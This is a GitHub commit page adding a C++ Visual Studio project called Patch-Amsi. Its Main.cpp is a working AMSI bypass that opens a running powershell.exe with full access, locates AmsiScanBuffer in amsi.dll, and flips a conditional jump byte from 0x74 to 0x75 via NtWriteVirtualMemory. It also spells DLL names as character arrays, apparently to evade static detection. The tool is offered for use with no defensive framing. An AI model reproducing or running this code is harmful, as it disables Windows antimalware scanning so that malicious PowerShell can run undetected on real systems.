Skip to content

Commit 7d19364

Browse files
Vith0rVith0r
authored
Add files via upload
0 parents  commit 7d19364

File tree

4 files changed

+406
-0
lines changed

4 files changed

+406
-0
lines changed

patch-amsi/Patch-Amsi.sln

Lines changed: 31 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,31 @@
1+
2+
Microsoft Visual Studio Solution File, Format Version 12.00
3+
# Visual Studio Version 17
4+
VisualStudioVersion = 17.11.35327.3
5+
MinimumVisualStudioVersion = 10.0.40219.1
6+
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Patch-Amsi", "Patch-Amsi\Patch-Amsi.vcxproj", "{49DFD09A-DE64-4B00-9988-792B85CA68B4}"
7+
EndProject
8+
Global
9+
GlobalSection(SolutionConfigurationPlatforms) = preSolution
10+
Debug|x64 = Debug|x64
11+
Debug|x86 = Debug|x86
12+
Release|x64 = Release|x64
13+
Release|x86 = Release|x86
14+
EndGlobalSection
15+
GlobalSection(ProjectConfigurationPlatforms) = postSolution
16+
{49DFD09A-DE64-4B00-9988-792B85CA68B4}.Debug|x64.ActiveCfg = Debug|x64
17+
{49DFD09A-DE64-4B00-9988-792B85CA68B4}.Debug|x64.Build.0 = Debug|x64
18+
{49DFD09A-DE64-4B00-9988-792B85CA68B4}.Debug|x86.ActiveCfg = Debug|Win32
19+
{49DFD09A-DE64-4B00-9988-792B85CA68B4}.Debug|x86.Build.0 = Debug|Win32
20+
{49DFD09A-DE64-4B00-9988-792B85CA68B4}.Release|x64.ActiveCfg = Release|x64
21+
{49DFD09A-DE64-4B00-9988-792B85CA68B4}.Release|x64.Build.0 = Release|x64
22+
{49DFD09A-DE64-4B00-9988-792B85CA68B4}.Release|x86.ActiveCfg = Release|Win32
23+
{49DFD09A-DE64-4B00-9988-792B85CA68B4}.Release|x86.Build.0 = Release|Win32
24+
EndGlobalSection
25+
GlobalSection(SolutionProperties) = preSolution
26+
HideSolutionNode = FALSE
27+
EndGlobalSection
28+
GlobalSection(ExtensibilityGlobals) = postSolution
29+
SolutionGuid = {91D3DBCF-32D6-4091-8265-2CD2EEE421CA}
30+
EndGlobalSection
31+
EndGlobal

patch-amsi/Patch-Amsi/Main.cpp

Lines changed: 218 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,218 @@
1+
#include <Windows.h>
2+
#include <TlHelp32.h>
3+
#include <winternl.h>
4+
#include <iostream>
5+
6+
// link: https://learn.microsoft.com/en-us/windows/console/console-screen-buffers#character-attributes
7+
void SetConsoleColor(WORD color) {
8+
HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE);
9+
SetConsoleTextAttribute(hConsole, color);
10+
}
11+
12+
typedef NTSTATUS(WINAPI* nt_write_virtual_memory_t)(
13+
HANDLE process_handle,
14+
PVOID base_address,
15+
PVOID buffer,
16+
ULONG number_of_bytes,
17+
PULONG number_of_bytes_written);
18+
19+
typedef NTSTATUS(WINAPI* nt_open_process_t)(
20+
PHANDLE process_handle,
21+
ACCESS_MASK desired_access,
22+
POBJECT_ATTRIBUTES object_attributes,
23+
CLIENT_ID* client_id);
24+
25+
DWORD obter_id_processo_por_nome(const wchar_t* nome_processo) {
26+
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
27+
if (snapshot != INVALID_HANDLE_VALUE) {
28+
PROCESSENTRY32W entrada_processo;
29+
entrada_processo.dwSize = sizeof(PROCESSENTRY32W);
30+
if (Process32FirstW(snapshot, &entrada_processo)) {
31+
do {
32+
if (wcscmp(entrada_processo.szExeFile, nome_processo) == 0) {
33+
CloseHandle(snapshot);
34+
return entrada_processo.th32ProcessID;
35+
}
36+
} while (Process32NextW(snapshot, &entrada_processo));
37+
}
38+
}
39+
CloseHandle(snapshot);
40+
return 0;
41+
}
42+
43+
int main() {
44+
HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE);
45+
std::cout << "------------------------------------------------------------------------- \n" << std::endl;
46+
SetConsoleColor(FOREGROUND_RED | FOREGROUND_INTENSITY);
47+
printf(
48+
"~~~~~~~~~~~~~~~~~~~~~~ +-+-+-+-+-+-+-+-+-+-+-+-+-+ ~~~~~~~~~~~~~~~~~~~~~~\n"
49+
"~~~~~~~~~~~~~~~~~~~~~~ ||| /////////////////// ||| ~~~~~~~~~~~~~~~~~~~~~~\n"
50+
"~~~~~~~~~~~~~~~~~~~~~~ ||| -> Patch amsi.dll ||| ~~~~~~~~~~~~~~~~~~~~~~\n"
51+
"~~~~~~~~~~~~~~~~~~~~~~ ||| -> By Vithor176 ^-^ ||| ~~~~~~~~~~~~~~~~~~~~~~\n"
52+
"~~~~~~~~~~~~~~~~~~~~~~ ||| /////////////////// ||| ~~~~~~~~~~~~~~~~~~~~~~\n"
53+
"~~~~~~~~~~~~~~~~~~~~~~ +-+-+-+-+-+-+-+-+-+-+-+-+-+ ~~~~~~~~~~~~~~~~~~~~~~\n\n"
54+
);
55+
56+
SetConsoleTextAttribute(hConsole, 7);
57+
std::cout << "------------------------------------------------------------------------- \n" << std::endl;
58+
59+
const wchar_t* nome_processo = L"powershell.exe";
60+
DWORD id_processo = obter_id_processo_por_nome(nome_processo);
61+
62+
if (id_processo == 0) {
63+
SetConsoleColor(FOREGROUND_RED | FOREGROUND_INTENSITY);
64+
std::wcout << L"Processo " << nome_processo << L" nao encontrado." << std::endl;
65+
return 1;
66+
}
67+
68+
const wchar_t n_dll_name[] = { 'n','t','d','l','l','.','d','l','l',0 };
69+
HMODULE h_ntdll = GetModuleHandleW(n_dll_name);
70+
if (!h_ntdll) {
71+
std::cout << "Falha ao carregar ntdll.dll." << std::endl;
72+
return 1;
73+
}
74+
75+
auto nt_write_virtual_memory = (nt_write_virtual_memory_t)GetProcAddress(h_ntdll, "NtWriteVirtualMemory");
76+
auto nt_open_process = (nt_open_process_t)GetProcAddress(h_ntdll, "NtOpenProcess");
77+
78+
if (!nt_write_virtual_memory || !nt_open_process) {
79+
std::cout << "Falha ao obter ponteiros para as funcoes NT." << std::endl;
80+
return 1;
81+
}
82+
83+
CLIENT_ID client_id = { reinterpret_cast<HANDLE>(static_cast<uintptr_t>(id_processo)), nullptr };
84+
85+
OBJECT_ATTRIBUTES obj_attributes;
86+
InitializeObjectAttributes(&obj_attributes, NULL, 0, NULL, NULL);
87+
88+
HANDLE h_processo;
89+
NTSTATUS status = nt_open_process(&h_processo, PROCESS_ALL_ACCESS, &obj_attributes, &client_id);
90+
if (status != 0) {
91+
std::cout << "Falha ao abrir o processo. Codigo de erro: " << std::hex << status << std::endl;
92+
CloseHandle(h_processo);
93+
return 1;
94+
}
95+
96+
const wchar_t am_dll[] = { 'a','m','s','i','.','d','l','l',0 };
97+
HMODULE h_amsi = LoadLibraryW(am_dll);
98+
if (h_amsi == NULL) {
99+
std::cout << "Falha ao carregar a biblioteca amsi.dll." << std::endl;
100+
CloseHandle(h_processo);
101+
return 1;
102+
}
103+
104+
FARPROC amsi_scan_buffer = GetProcAddress(h_amsi, "AmsiScanBuffer");
105+
if (amsi_scan_buffer == NULL) {
106+
std::cout << "Falha ao localizar AmsiScanBuffer." << std::endl;
107+
FreeLibrary(h_amsi);
108+
CloseHandle(h_processo);
109+
return 1;
110+
}
111+
112+
SetConsoleColor(FOREGROUND_GREEN | FOREGROUND_INTENSITY);
113+
std::cout << "Endereco de AmsiScanBuffer: ";
114+
SetConsoleTextAttribute(hConsole, 7);
115+
std::cout << amsi_scan_buffer << std::endl;
116+
SetConsoleTextAttribute(hConsole, 7);
117+
BYTE* endereco_patch = (BYTE*)amsi_scan_buffer + 0x95;
118+
SetConsoleColor(FOREGROUND_GREEN | FOREGROUND_INTENSITY);
119+
std::cout << "Endereco de AmsiScanBuffer ";
120+
SetConsoleTextAttribute(hConsole, 7);
121+
std::cout << "+ 0x95 = " << static_cast<void*>(endereco_patch) << std::endl;
122+
SetConsoleColor(FOREGROUND_GREEN | FOREGROUND_INTENSITY);
123+
std::cout << "Endereco do patch: ";
124+
SetConsoleTextAttribute(hConsole, 7);
125+
std::cout << static_cast<void*>(endereco_patch) << std::endl;
126+
127+
SetConsoleTextAttribute(hConsole, 7);
128+
std::cout << "\n-------------------------------------------------------------------------" << std::endl;
129+
130+
MEMORY_BASIC_INFORMATION mbi;
131+
if (VirtualQueryEx(h_processo, endereco_patch, &mbi, sizeof(mbi))) {
132+
SetConsoleColor(FOREGROUND_GREEN | FOREGROUND_INTENSITY);
133+
std::cout << "\nPermissao atual de memoria do patch: ";
134+
SetConsoleTextAttribute(hConsole, 7);
135+
std::cout << mbi.Protect;
136+
BYTE current_byte;
137+
SIZE_T bytes_read;
138+
if (ReadProcessMemory(h_processo, endereco_patch, &current_byte, sizeof(current_byte), &bytes_read)) {
139+
SetConsoleColor(FOREGROUND_GREEN | FOREGROUND_INTENSITY);
140+
std::cout << "\nValor atual no patch: ";
141+
SetConsoleTextAttribute(hConsole, 7);
142+
std::cout << "0x" << std::hex << static_cast<int>(current_byte) << std::endl;
143+
}
144+
else {
145+
SetConsoleColor(FOREGROUND_RED | FOREGROUND_INTENSITY);
146+
std::cout << "\nFalha ao ler o valor atual do patch. Codigo de erro: " << GetLastError() << std::endl;
147+
}
148+
}
149+
150+
DWORD old_protect;
151+
ULONG tamanho_regiao = 0x1000;
152+
153+
SetConsoleTextAttribute(hConsole, 7);
154+
std::cout << "\n-------------------------------------------------------------------------" << std::endl;
155+
156+
SetConsoleColor(FOREGROUND_GREEN | FOREGROUND_INTENSITY);
157+
std::cout << "Alterando a protecao de memoria do patch com ";
158+
SetConsoleTextAttribute(hConsole, 7);
159+
std::cout << "VirtualProtectEx!" << std::endl;
160+
if (!VirtualProtectEx(h_processo, endereco_patch, tamanho_regiao, PAGE_EXECUTE_READWRITE, &old_protect)) {
161+
SetConsoleColor(FOREGROUND_RED | FOREGROUND_INTENSITY);
162+
std::cout << "\nFalha ao alterar permissoes de memoria. Codigo de erro: " << GetLastError() << std::endl;
163+
CloseHandle(h_processo);
164+
FreeLibrary(h_amsi);
165+
return 1;
166+
}
167+
168+
SetConsoleColor(FOREGROUND_GREEN | FOREGROUND_INTENSITY);
169+
std::cout << "\nPermissao de memoria do patch alterado para: ";
170+
SetConsoleTextAttribute(hConsole, 7);
171+
std::cout << std::hex << old_protect << std::endl;
172+
173+
// Patch - troca o byte de 0x74 para 0x75 (JZ para JNZ)
174+
BYTE patch = 0x75;
175+
SIZE_T bytes_escritos;
176+
status = nt_write_virtual_memory(h_processo, endereco_patch, &patch, sizeof(patch), (PULONG)&bytes_escritos);
177+
BYTE current_byte;
178+
SIZE_T bytes_read;
179+
if (ReadProcessMemory(h_processo, endereco_patch, &current_byte, sizeof(current_byte), &bytes_read)) {
180+
SetConsoleColor(FOREGROUND_GREEN | FOREGROUND_INTENSITY);
181+
std::cout << "\nValor atual no patch apos a alteracao com ";
182+
SetConsoleTextAttribute(hConsole, 7);
183+
std::cout << "NtWriteVirtualMemory: ";
184+
std::cout << "0x" << std::hex << static_cast<int>(current_byte) << std::endl;
185+
}
186+
else {
187+
SetConsoleColor(FOREGROUND_RED | FOREGROUND_INTENSITY);
188+
std::cout << "\nFalha ao ler o valor atual do patch. Codigo de erro: " << GetLastError() << std::endl;
189+
}
190+
191+
if (status != 0 || bytes_escritos != sizeof(patch)) {
192+
std::cout << "\nFalha ao escrever na memoria. Codigo de erro: " << std::hex << status << std::endl;
193+
VirtualProtectEx(h_processo, endereco_patch, tamanho_regiao, old_protect, &old_protect);
194+
FreeLibrary(h_amsi);
195+
CloseHandle(h_processo);
196+
return 1;
197+
}
198+
199+
if (!VirtualProtectEx(h_processo, endereco_patch, tamanho_regiao, old_protect, &old_protect)) {
200+
std::cout << "\nFalha ao restaurar permissões de memória. Codigo de erro: " << GetLastError() << std::endl;
201+
}
202+
else {
203+
SetConsoleColor(FOREGROUND_GREEN | FOREGROUND_INTENSITY);
204+
std::cout << "\nPermissao de memoria do patch restaurada com sucesso." << std::endl;
205+
}
206+
207+
FreeLibrary(h_amsi);
208+
CloseHandle(h_processo);
209+
210+
SetConsoleTextAttribute(hConsole, 7);
211+
std::cout << "-------------------------------------------------------------------------" << std::endl;
212+
213+
SetConsoleColor(FOREGROUND_BLUE | FOREGROUND_INTENSITY);
214+
std::cout << "Patch aplicado com sucesso! :P" << std::endl;
215+
SetConsoleTextAttribute(hConsole, 7);
216+
std::cout << "-------------------------------------------------------------------------" << std::endl;
217+
return 0;
218+
}

patch-amsi/Patch-Amsi/Patch-Amsi.vcxproj

Lines changed: 135 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,135 @@
1+
<?xml version="1.0" encoding="utf-8"?>
2+
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3+
<ItemGroup Label="ProjectConfigurations">
4+
<ProjectConfiguration Include="Debug|Win32">
5+
<Configuration>Debug</Configuration>
6+
<Platform>Win32</Platform>
7+
</ProjectConfiguration>
8+
<ProjectConfiguration Include="Release|Win32">
9+
<Configuration>Release</Configuration>
10+
<Platform>Win32</Platform>
11+
</ProjectConfiguration>
12+
<ProjectConfiguration Include="Debug|x64">
13+
<Configuration>Debug</Configuration>
14+
<Platform>x64</Platform>
15+
</ProjectConfiguration>
16+
<ProjectConfiguration Include="Release|x64">
17+
<Configuration>Release</Configuration>
18+
<Platform>x64</Platform>
19+
</ProjectConfiguration>
20+
</ItemGroup>
21+
<PropertyGroup Label="Globals">
22+
<VCProjectVersion>17.0</VCProjectVersion>
23+
<Keyword>Win32Proj</Keyword>
24+
<ProjectGuid>{49dfd09a-de64-4b00-9988-792b85ca68b4}</ProjectGuid>
25+
<RootNamespace>PatchAmsi</RootNamespace>
26+
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
27+
</PropertyGroup>
28+
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
29+
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
30+
<ConfigurationType>Application</ConfigurationType>
31+
<UseDebugLibraries>true</UseDebugLibraries>
32+
<PlatformToolset>v143</PlatformToolset>
33+
<CharacterSet>Unicode</CharacterSet>
34+
</PropertyGroup>
35+
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
36+
<ConfigurationType>Application</ConfigurationType>
37+
<UseDebugLibraries>false</UseDebugLibraries>
38+
<PlatformToolset>v143</PlatformToolset>
39+
<WholeProgramOptimization>true</WholeProgramOptimization>
40+
<CharacterSet>Unicode</CharacterSet>
41+
</PropertyGroup>
42+
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
43+
<ConfigurationType>Application</ConfigurationType>
44+
<UseDebugLibraries>true</UseDebugLibraries>
45+
<PlatformToolset>v143</PlatformToolset>
46+
<CharacterSet>Unicode</CharacterSet>
47+
</PropertyGroup>
48+
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
49+
<ConfigurationType>Application</ConfigurationType>
50+
<UseDebugLibraries>false</UseDebugLibraries>
51+
<PlatformToolset>v143</PlatformToolset>
52+
<WholeProgramOptimization>true</WholeProgramOptimization>
53+
<CharacterSet>Unicode</CharacterSet>
54+
</PropertyGroup>
55+
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
56+
<ImportGroup Label="ExtensionSettings">
57+
</ImportGroup>
58+
<ImportGroup Label="Shared">
59+
</ImportGroup>
60+
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
61+
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
62+
</ImportGroup>
63+
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
64+
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
65+
</ImportGroup>
66+
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
67+
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
68+
</ImportGroup>
69+
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
70+
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
71+
</ImportGroup>
72+
<PropertyGroup Label="UserMacros" />
73+
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
74+
<ClCompile>
75+
<WarningLevel>Level3</WarningLevel>
76+
<SDLCheck>true</SDLCheck>
77+
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
78+
<ConformanceMode>true</ConformanceMode>
79+
</ClCompile>
80+
<Link>
81+
<SubSystem>Console</SubSystem>
82+
<GenerateDebugInformation>true</GenerateDebugInformation>
83+
</Link>
84+
</ItemDefinitionGroup>
85+
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
86+
<ClCompile>
87+
<WarningLevel>Level3</WarningLevel>
88+
<FunctionLevelLinking>true</FunctionLevelLinking>
89+
<IntrinsicFunctions>true</IntrinsicFunctions>
90+
<SDLCheck>true</SDLCheck>
91+
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
92+
<ConformanceMode>true</ConformanceMode>
93+
</ClCompile>
94+
<Link>
95+
<SubSystem>Console</SubSystem>
96+
<EnableCOMDATFolding>true</EnableCOMDATFolding>
97+
<OptimizeReferences>true</OptimizeReferences>
98+
<GenerateDebugInformation>true</GenerateDebugInformation>
99+
</Link>
100+
</ItemDefinitionGroup>
101+
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
102+
<ClCompile>
103+
<WarningLevel>Level3</WarningLevel>
104+
<SDLCheck>true</SDLCheck>
105+
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
106+
<ConformanceMode>true</ConformanceMode>
107+
</ClCompile>
108+
<Link>
109+
<SubSystem>Console</SubSystem>
110+
<GenerateDebugInformation>true</GenerateDebugInformation>
111+
</Link>
112+
</ItemDefinitionGroup>
113+
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
114+
<ClCompile>
115+
<WarningLevel>Level3</WarningLevel>
116+
<FunctionLevelLinking>true</FunctionLevelLinking>
117+
<IntrinsicFunctions>true</IntrinsicFunctions>
118+
<SDLCheck>true</SDLCheck>
119+
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
120+
<ConformanceMode>true</ConformanceMode>
121+
</ClCompile>
122+
<Link>
123+
<SubSystem>Console</SubSystem>
124+
<EnableCOMDATFolding>true</EnableCOMDATFolding>
125+
<OptimizeReferences>true</OptimizeReferences>
126+
<GenerateDebugInformation>true</GenerateDebugInformation>
127+
</Link>
128+
</ItemDefinitionGroup>
129+
<ItemGroup>
130+
<ClCompile Include="Main.cpp" />
131+
</ItemGroup>
132+
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
133+
<ImportGroup Label="ExtensionTargets">
134+
</ImportGroup>
135+
</Project>

0 commit comments

Comments
 (0)